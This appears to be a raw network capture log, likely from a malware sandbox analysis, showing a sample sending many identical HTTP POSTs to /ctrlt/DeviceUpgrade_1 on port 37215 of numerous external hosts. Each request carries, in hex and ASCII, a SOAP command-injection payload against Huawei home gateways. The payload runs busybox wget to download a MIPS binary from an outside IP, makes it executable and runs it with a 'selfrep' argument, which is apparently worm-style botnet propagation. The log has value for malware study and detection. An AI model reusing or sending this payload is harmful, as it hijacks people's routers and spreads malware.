                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          986192.168.2.154111441.48.171.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.691660881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          987192.168.2.1543990157.114.51.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.691685915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          988192.168.2.1535138157.194.247.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.695975065 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          989192.168.2.1551422204.121.9.15937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.695998907 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          990192.168.2.154325041.189.217.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696032047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          991192.168.2.1536920172.79.84.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696288109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          992192.168.2.1534574157.207.170.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696329117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          993192.168.2.155824441.47.34.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696609974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          994192.168.2.1559872197.219.77.25037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696686029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          995192.168.2.1553576197.112.18.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696715117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
